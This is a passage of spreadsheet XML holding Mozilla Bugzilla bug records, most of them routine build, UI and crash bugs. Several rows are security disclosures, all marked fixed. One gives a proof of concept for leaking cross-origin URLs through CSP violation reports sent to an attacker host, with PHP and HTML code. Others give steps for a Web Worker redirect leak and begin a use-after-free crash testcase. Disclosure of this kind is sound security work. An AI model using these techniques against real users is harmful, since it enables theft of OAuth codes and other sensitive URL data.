    Found by: call frame info
 7  xul.dll!nsCSSParser::Parse(nsIUnicharInputStream *,nsIURI *,nsIURI *,nsIPrincipal *,unsigned int,int) [nsCSSParser.cpp : 9045 + 0x21]
    eip = 0x109e7de9   esp = 0x0012d2cc   ebp = 0x0012d2e8
    Found by: call frame info
17 crashes on windows in last week in socorro.</t>
        </is>
      </c>
      <c r="X2038" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" t="n">
        <v>514700</v>
      </c>
      <c r="B2039" t="inlineStr">
        <is>
          <t>2009-09-04 09:42:48 -0700</t>
        </is>
      </c>
      <c r="C2039" t="inlineStr">
        <is>
          <t>symbol server uploads broken for 1.9.1 xulrunner builds</t>
        </is>
      </c>
      <c r="D2039" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2039" t="n">
        <v>1</v>
      </c>
      <c r="F2039" t="n">
        <v>1</v>
      </c>
      <c r="G2039" t="n">
        <v>5</v>
      </c>
      <c r="H2039" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2039" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2039" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2039" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2039" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2039" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N2039" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2039" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2039" t="inlineStr"/>
      <c r="Q2039" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2039" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2039" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2039" t="n">
        <v>1</v>
      </c>
      <c r="U2039" t="n">
        <v>0</v>
      </c>
      <c r="V2039" t="n">
        <v>6</v>
      </c>
      <c r="W2039" t="inlineStr">
        <is>
          <t>Compare:
http://symbols.mozilla.org/xulrunner/xulrunner-1.9.1.3-WINNT-20090903134039-symbols.txt
vs.
http://symbols.mozilla.org/xulrunner/xulrunner-1.9.0.14-WINNT-2009082721-symbols.txt
This might be as simple as MOZ_DEBUG_SYMBOLS not being set in the mozconfig.</t>
        </is>
      </c>
      <c r="X2039" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" t="n">
        <v>838006</v>
      </c>
      <c r="B2040" t="inlineStr">
        <is>
          <t>2013-02-04 19:00:13 -0800</t>
        </is>
      </c>
      <c r="C2040" t="inlineStr">
        <is>
          <t>[E-Mail][User Story] E-Mail image attachment</t>
        </is>
      </c>
      <c r="D2040" t="inlineStr">
        <is>
          <t>2013-10-01 13:27:12 -0700</t>
        </is>
      </c>
      <c r="E2040" t="n">
        <v>1</v>
      </c>
      <c r="F2040" t="n">
        <v>1</v>
      </c>
      <c r="G2040" t="n">
        <v>6</v>
      </c>
      <c r="H2040" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2040" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2040" t="inlineStr">
        <is>
          <t>Gaia::E-Mail</t>
        </is>
      </c>
      <c r="K2040" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2040" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2040" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2040" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2040" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2040" t="inlineStr">
        <is>
          <t>[LOE:L][by 3/15],relnote-b2g:1.1+</t>
        </is>
      </c>
      <c r="Q2040" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2040" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2040" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2040" t="n">
        <v>1</v>
      </c>
      <c r="U2040" t="n">
        <v>0</v>
      </c>
      <c r="V2040" t="n">
        <v>22</v>
      </c>
      <c r="W2040" t="inlineStr">
        <is>
          <t>UCID: Email-138
User Story:
As a user, I want to be able to attach one or more image files (based on currently supported MIME types) to new emails or within replies to emails so that I can share content with my recipients.</t>
        </is>
      </c>
      <c r="X2040" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" t="n">
        <v>449703</v>
      </c>
      <c r="B2041" t="inlineStr">
        <is>
          <t>2008-08-07 18:55:23 -0700</t>
        </is>
      </c>
      <c r="C2041" t="inlineStr">
        <is>
          <t>[1.8 branch] XBM appears to draw uninitialized memory</t>
        </is>
      </c>
      <c r="D2041" t="inlineStr">
        <is>
          <t>2008-09-23 09:47:39 -0700</t>
        </is>
      </c>
      <c r="E2041" t="n">
        <v>1</v>
      </c>
      <c r="F2041" t="n">
        <v>1</v>
      </c>
      <c r="G2041" t="n">
        <v>3</v>
      </c>
      <c r="H2041" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2041" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2041" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2041" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2041" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2041" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2041" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2041" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2041" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q2041" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2041" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2041" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2041" t="n">
        <v>1</v>
      </c>
      <c r="U2041" t="n">
        <v>0</v>
      </c>
      <c r="V2041" t="n">
        <v>14</v>
      </c>
      <c r="W2041" t="inlineStr">
        <is>
          <t>Created attachment 332877
testcase (XBM)
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16
Loading this XBM file makes Firefox 2 draw some random pixels.  They're different each time the image is reloaded, so it seems like Firefox might be displaying contents of uninitialized memory.
In Firefox 3 and trunk, I just see white, but I don't know whether the bug was really fixed (or whether it was fixed intentionally).
Billy Hoffman pointed this bug out during his talk at Black Hat today.</t>
        </is>
      </c>
      <c r="X2041" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" t="n">
        <v>558729</v>
      </c>
      <c r="B2042" t="inlineStr">
        <is>
          <t>2010-04-11 23:31:37 -0700</t>
        </is>
      </c>
      <c r="C2042" t="inlineStr">
        <is>
          <t>Associate languages with products, not locations</t>
        </is>
      </c>
      <c r="D2042" t="inlineStr">
        <is>
          <t>2010-05-04 05:27:58 -0700</t>
        </is>
      </c>
      <c r="E2042" t="n">
        <v>1</v>
      </c>
      <c r="F2042" t="n">
        <v>1</v>
      </c>
      <c r="G2042" t="n">
        <v>4</v>
      </c>
      <c r="H2042" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2042" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J2042" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K2042" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2042" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2042" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2042" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2042" t="inlineStr"/>
      <c r="Q2042" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2042" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2042" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2042" t="n">
        <v>1</v>
      </c>
      <c r="U2042" t="n">
        <v>0</v>
      </c>
      <c r="V2042" t="n">
        <v>4</v>
      </c>
      <c r="W2042" t="inlineStr">
        <is>
          <t>Languages should be valid per product, not per location. Probably need to slightly denormalize this, we don't want a separate languages table as the language list comes from product-details.
Locations should have a placeholder %LANG% that the respective language code is filled into when generating the final download URL.</t>
        </is>
      </c>
      <c r="X2042" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" t="n">
        <v>564705</v>
      </c>
      <c r="B2043" t="inlineStr">
        <is>
          <t>2010-05-09 15:01:35 -0700</t>
        </is>
      </c>
      <c r="C2043" t="inlineStr">
        <is>
          <t>String buffer underflow and crash [@ nsTextBoxFrame::UpdateAccessTitle]</t>
        </is>
      </c>
      <c r="D2043" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:50 -0700</t>
        </is>
      </c>
      <c r="E2043" t="n">
        <v>1</v>
      </c>
      <c r="F2043" t="n">
        <v>1</v>
      </c>
      <c r="G2043" t="n">
        <v>3</v>
      </c>
      <c r="H2043" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2043" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2043" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K2043" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2043" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2043" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2043" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2043" t="inlineStr">
        <is>
          <t>[sg:low UMR]</t>
        </is>
      </c>
      <c r="Q2043" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2043" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2043" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2043" t="n">
        <v>1</v>
      </c>
      <c r="U2043" t="n">
        <v>0</v>
      </c>
      <c r="V2043" t="n">
        <v>10</v>
      </c>
      <c r="W2043" t="inlineStr">
        <is>
          <t>Created attachment 444324
testcase (may crash Firefox when loaded)
nsTextBoxFrame::UpdateAccessTitle tried to subtract 1 from 0 and got 2^32-1.
###!!! ASSERTION: index exceeds allowable range: 'i &lt;= mLength', file nsTString.h, line 129
At least on a 64-bit system, a crash immediately follows the assertion.  
#5  0x00007f9f2e7b9422 in nsString::CharAt (this=0x7f9f13b78ac8, i=4294967295) at ../../../dist/include/nsTString.h:130
#6  0x00007f9f2e7b9448 in nsString::operator[] (this=0x7f9f13b78ac8, i=4294967295) at ../../../dist/include/nsTString.h:135
#7  0x00007f9f2ec81bcd in nsTextBoxFrame::UpdateAccessTitle (this=0x7f9f13b78a78) at layout/xul/base/src/nsTextBoxFrame.cpp:878
#8  0x00007f9f2ec7fc9e in nsTextBoxFrame::UpdateAccesskey (this=0x7f9f13b78a78, aWeakThis=...)
    at layout/xul/base/src/nsTextBoxFrame.cpp:264
#9  0x00007f9f2ec82b13 in nsAsyncAccesskeyUpdate::ReflowFinished (this=0x7f9f13b91060) at layout/xul/base/src/nsTextBoxFrame.cpp:224</t>
        </is>
      </c>
      <c r="X2043" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" t="n">
        <v>1490622</v>
      </c>
      <c r="B2044" t="inlineStr">
        <is>
          <t>2018-09-12 02:56:26 -0700</t>
        </is>
      </c>
      <c r="C2044" t="inlineStr">
        <is>
          <t>/sources/highlight/ page should highlight the line number specified in the anchor</t>
        </is>
      </c>
      <c r="D2044" t="inlineStr">
        <is>
          <t>2019-01-16 11:07:43 -0800</t>
        </is>
      </c>
      <c r="E2044" t="n">
        <v>1</v>
      </c>
      <c r="F2044" t="n">
        <v>1</v>
      </c>
      <c r="G2044" t="n">
        <v>4</v>
      </c>
      <c r="H2044" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2044" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2044" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K2044" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2044" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2044" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2044" t="inlineStr"/>
      <c r="Q2044" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2044" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2044" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2044" t="n">
        <v>1</v>
      </c>
      <c r="U2044" t="n">
        <v>0</v>
      </c>
      <c r="V2044" t="n">
        <v>10</v>
      </c>
      <c r="W2044" t="inlineStr">
        <is>
          <t>A minor nit, but I clicked a source link from a crash report that led to a /sources/highlight/ page:
https://crash-stats.mozilla.com/sources/highlight/?url=https://gecko-generated-sources.s3.amazonaws.com/012d596d312520f1955f9a4bfe2b3746677b792aa9a98b6c1ff4603c09239ad8b35e2654d4bf8baebe3e74bfd62460ab87a8eae6ca9e7146bd081ab677671bd7/dom/bindings/MessageManagerBinding.cpp#L-6637
and it wasn't readily apparent what the actual line in question was. Compare vs. a link to hg.mo from the same crash report:
https://hg.mozilla.org/mozilla-central/annotate/1169e8a4ca2b7f3cbffdaf70f6d18a5142ed32d7/toolkit/xre/nsWindowsWMain.cpp#l143
There you can see the line that was linked to is clearly highlighted. It would be nice if we did the same thing on the /sources/highlight/ page.</t>
        </is>
      </c>
      <c r="X2044" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" t="n">
        <v>1790345</v>
      </c>
      <c r="B2045" t="inlineStr">
        <is>
          <t>2022-09-12 03:35:41 -0700</t>
        </is>
      </c>
      <c r="C2045" t="inlineStr">
        <is>
          <t>CSP violation report can be made to leak cross origin information from embedded page (bypassing SOP)</t>
        </is>
      </c>
      <c r="D2045" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:22 -0700</t>
        </is>
      </c>
      <c r="E2045" t="n">
        <v>1</v>
      </c>
      <c r="F2045" t="n">
        <v>1</v>
      </c>
      <c r="G2045" t="n">
        <v>3</v>
      </c>
      <c r="H2045" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2045" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2045" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2045" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2045" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2045" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2045" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][domsecurity-active][adv-main110+][adv-esr102.8+], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q2045" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2045" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2045" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T2045" t="n">
        <v>1</v>
      </c>
      <c r="U2045" t="n">
        <v>0</v>
      </c>
      <c r="V2045" t="n">
        <v>49</v>
      </c>
      <c r="W2045" t="inlineStr">
        <is>
          <t>I had some difficulties to give this a proper name, but I hope it can be clarified by the content of the report. Please rename it as you see fit.
I have found an issue in Firefox implementation of CSP reporting directives, that can be used by a malicious user to leak full URL's (Including scheme, authorization, domain, port, path and query. Only excluding fragment) from a victim user's cross-origin (and cross site) activity. This can in the worst case leak highly sensitive information such as OAuth codes, user form content and similar information present in URLs.
The problem arise due to a flaw in the implementation of handling of redirects in CSP reporting directives. A malicious user can create a page with a "Content-Security-Policy-Report-Only" header that restrict what URLs are frameable in the page. Assuming this header
Content-Security-Policy-Report-Only: frame-src 'none'; report-uri https://example.com
Any attempt of framing a page will result in a violation and a report being sent to https://example.com. This report will contain some information of the violation and in particular it will contain the "blocked-uri". To avoid leaking cross-origin information, w3c specs have some restrictions on what is allowed in the blocked-uri part of the report. See
https://w3c.github.io/webappsec-csp/#security-violation-reports
The above link seems to only discuss redirects (which I will describe as problem number 1 below), but this page on MDN
https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP#sample_violation_report
also suggests that the full path should be redacted even on initial cross-origin requests.
&gt; "As you can see, the report includes the full path to the violating resource in blocked-uri. This is not always the case. For example, if the signup.html attempted to load CSS from http://anothercdn.example.com/stylesheet.css, the browser would not include the full path, but only the origin (http://anothercdn.example.com)"
The current implementation in Firefox break these rules in two ways:
## Leaking cross-origin information in blocked-uri on original request
As you can read in my second link above, Mozilla states that when making a cross-origin request that is blocked by a CSP rule, the "blocked-uri" part of the report should only include the origin. This is not the case in Firefox at the moment. Given the CSP header
Content-Security-Policy-Report-Only: frame-src 'none'; report-uri https://attacker.example.com
And the page content
&lt;iframe src="https://a:a@sub1.example.com/links.html?test=test#test"&gt;&lt;/iframe&gt;
Will result in a report sent with this information
"blocked-uri": "https://a:a@sub1.example.com/links.html?test=test"
This is in contrast to Chrome and Safari that will respond with this report
"blocked-uri": "https://sub1.example.com"
This is probably a minor issue as the user in control of the main page (implementing the CSP) could possibly access DOM object and get similar information. But there might be edge cases where this is an unwanted leakage.
## Leaking cross-origin full URLs when a framed page redirects
A lot worse than the above leak is how Firefox handles "in-frame redirects" from cross-origin content. This attack is a proper bug and not only an interpretation of the specs.
By setting a Content-Security-Policy-Report-Only instead of a Content-Security-Policy a malicious page can frame another page, and the victim user will be able to navigate this embedded page without any notification that all navigation will violate the CSP and thus send reports to the configured report-uri. Normal cross-origin navigation in such a frame will result in a report containing blocked-uri of only the violating origin (as it should). Like this
"blocked-uri": "https://sub1.example.com"
And even if the attacker can "trace" the user's action through origins this way, I think that this is "by design" that all subsequent navigation also triggers the CSP violation. The big problem though is when any subsequent navigation encounters a redirect, then Firefox generates two violation reports, one containing only the origin but one containing the full pre-redirect URL. To make an example (with frame-src 'none')
1. Page attacker.com embeds victim1.com in an iframe (this will trigger a first report containing the full URL as per the first issue above)
2. victim.com contains a link to https://victim2.com/test?test=test, clicking it will trigger a regular report containing only the origin of victim2.com
3. victim2.com contains a link to https://victim3.com/test?test=test but victim3.com redirects to victim3.com/login now (because of the redirect) there will be two reports generated. One containing the origin of victim3 but also one containing the full pre redirect URL https://victim3.com/test?test=test
Notice that the attacker's page which is at a completely different origin (and site), will leak data from a cross origin embedded page. Redirects like these are quite common when a user either use some OAuth flows and also when pages deal with form data requests, making the likelihood of a redirect containing sensitive data high.
A restriction to this attack is that the victim page must be frameable.
## Example
To test this behavior you can use my example page. I host a PHP page that will add a CSP-report url given as a query parameter. This page will frame another page hosted on GitHub pages. The GitHub pages are configured with a custom domain. So when trying to access the GitHub page directly, it will make a redirect to the configured domain. This was the easiest way for me to show off the impact, it can probably be easier researched by setting up some properly hosted domains (or spoof them with /etc/hosts)
1. Set up some sort of "catch server" to collect the CSP reports (i used webhook.site for this)
2. Go to https://joaxcar.com/frame.php?url=YOUR_SERVER (and replace YOUR_SERVER with the catch server)
3. The page will contain one frame at the top just proving the first described issue (the page does not exist, but the report is sent anyway). Then the page contains a frame of my page https://sub1.joaxcar.com this page contains one regular link, one link that will cause a redirect and one form that on submission will make a redirect. Click around
4. Check the report logs
## Verions
Tested on version 104.0.2 (64-bit) on Mac-OS 12.5.1
## Test code
PHP site:
```PHP
&lt;?php
    header("Content-Security-Policy-Report-Only: frame-src 'none'; img-src 'none'; report-uri " . $_GET["url"]);
?&gt;
&lt;html&gt;
    &lt;body&gt;
        &lt;h2&gt;A frame to test leakage of embeded cross origin resource&lt;/h2&gt;
        &lt;iframe src="https://a:a@sub1.example.com/links.html?test=test#test"&gt;&lt;/iframe&gt;
        &lt;h2&gt;A frame to test embeded cross origin navigation&lt;/h2&gt;
        &lt;iframe src="https://sub1.joaxcar.com/links.html"&gt;&lt;/iframe&gt;
    &lt;/body&gt;
&lt;/html&gt;
```
HTML site hosted on other origin:
```html
&lt;html&gt;
  &lt;head&gt;&lt;/head&gt;
  &lt;body&gt;
    &lt;a href="https://sub1.joaxcar.com/links.html?code=123abc#test"&gt;regular link&lt;/a&gt;
    &lt;br/&gt;
    &lt;a href="https://joaxcar.github.io/sop/links.html?code=123abc#test"&gt;redirect link&lt;/a&gt;
    &lt;br/&gt;
    &lt;h3&gt;Redirect form&lt;/h3&gt;
    &lt;form action="https://joaxcar.github.io/sop/links.html"&gt;
      &lt;input type=text name=text value=test&gt;
      &lt;input type=submit&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;
```
Please ask if anything is unclear, as I had some trouble minifying the POC</t>
        </is>
      </c>
      <c r="X2045" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" t="n">
        <v>488690</v>
      </c>
      <c r="B2046" t="inlineStr">
        <is>
          <t>2009-04-16 07:43:21 -0700</t>
        </is>
      </c>
      <c r="C2046" t="inlineStr">
        <is>
          <t>"Assertion failure: dn-&gt;pn_defn, at ../jsemit.cpp"</t>
        </is>
      </c>
      <c r="D2046" t="inlineStr">
        <is>
          <t>2009-12-09 16:00:29 -0800</t>
        </is>
      </c>
      <c r="E2046" t="n">
        <v>1</v>
      </c>
      <c r="F2046" t="n">
        <v>1</v>
      </c>
      <c r="G2046" t="n">
        <v>3</v>
      </c>
      <c r="H2046" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2046" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2046" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2046" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2046" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2046" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2046" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2046" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2046" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q2046" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2046" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2046" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2046" t="n">
        <v>1</v>
      </c>
      <c r="U2046" t="n">
        <v>0</v>
      </c>
      <c r="V2046" t="n">
        <v>12</v>
      </c>
      <c r="W2046" t="inlineStr">
        <is>
          <t>for each (let NaN in [x])
for(let x = (x for ([] in false)) in false);
asserts dbg js shell without -j at Assertion failure: dn-&gt;pn_defn, at ../jsemit.cpp:1946
autoBisect shows this is probably related to bug 488015 :
The first bad revision is:
changeset:   27205:78a21b8efe1b
user:        Brendan Eich
date:        Wed Apr 15 01:57:13 2009 -0700
summary:     Bug 488015 - Crash [@ js_GetUpvar ] (also bogus JS errors, also probably Crash [@js_Interpret]) (future r=mrbkap, see bug).</t>
        </is>
      </c>
      <c r="X2046" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" t="n">
        <v>947592</v>
      </c>
      <c r="B2047" t="inlineStr">
        <is>
          <t>2013-12-07 03:15:37 -0800</t>
        </is>
      </c>
      <c r="C2047" t="inlineStr">
        <is>
          <t>Cross-origin information disclosure with error message of Web Workers</t>
        </is>
      </c>
      <c r="D2047" t="inlineStr">
        <is>
          <t>2024-05-30 08:30:50 -0700</t>
        </is>
      </c>
      <c r="E2047" t="n">
        <v>1</v>
      </c>
      <c r="F2047" t="n">
        <v>1</v>
      </c>
      <c r="G2047" t="n">
        <v>3</v>
      </c>
      <c r="H2047" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2047" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2047" t="inlineStr">
        <is>
          <t>DOM: Workers</t>
        </is>
      </c>
      <c r="K2047" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2047" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2047" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2047" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2047" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q2047" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2047" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2047" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2047" t="n">
        <v>1</v>
      </c>
      <c r="U2047" t="n">
        <v>0</v>
      </c>
      <c r="V2047" t="n">
        <v>20</v>
      </c>
      <c r="W2047" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 (Beta/Release)
Build ID: 20131112160018
Steps to reproduce:
1. Go to http://vulnerabledoma.in/fx_worker.html and click the button.
2. If you are Twitter user, you can see the following message:
Failed to load script: https://twitter.com/[USERNAME]/lists
If not:
Failed to load script: https://twitter.com/login?redirect_after_login=%2Flists%2F in error message.
This means that Firefox leaks redirect information to unrelated site.
Actual results:
Firefox includes redirect information in error message.
Expected results:
Firefox should not include redirect information in error message.</t>
        </is>
      </c>
      <c r="X2047" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" t="n">
        <v>1365602</v>
      </c>
      <c r="B2048" t="inlineStr">
        <is>
          <t>2017-05-17 07:00:05 -0700</t>
        </is>
      </c>
      <c r="C2048" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsQuoteList::RecalcAll</t>
        </is>
      </c>
      <c r="D2048" t="inlineStr">
        <is>
          <t>2024-05-30 09:33:28 -0700</t>
        </is>
      </c>
      <c r="E2048" t="n">
        <v>1</v>
      </c>
      <c r="F2048" t="n">
        <v>1</v>
      </c>
      <c r="G2048" t="n">
        <v>3</v>
      </c>
      <c r="H2048" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2048" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2048" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2048" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L2048" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2048" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2048" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2048" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2048" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2048" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2048" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2048" t="n">
        <v>1</v>
      </c>
      <c r="U2048" t="n">
        <v>0</v>
      </c>
      <c r="V2048" t="n">
        <v>19</v>
      </c>
      <c r="W2048" t="inlineStr">
        <is>
          <t>Created attachment 8868560
crash.html (testcase, crashes firefox)
The following testcase crashes the latest ASAN build of Firefox ESR 52.1.0 (BuildID=20170417135202).
&lt;script&gt;
function start() {
	o1=window.document;
	o186=document.createElementNS('http://www.w3.org/1999/xhtml','script');
	o221=document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
	document.documentElement.appendChild(o221);
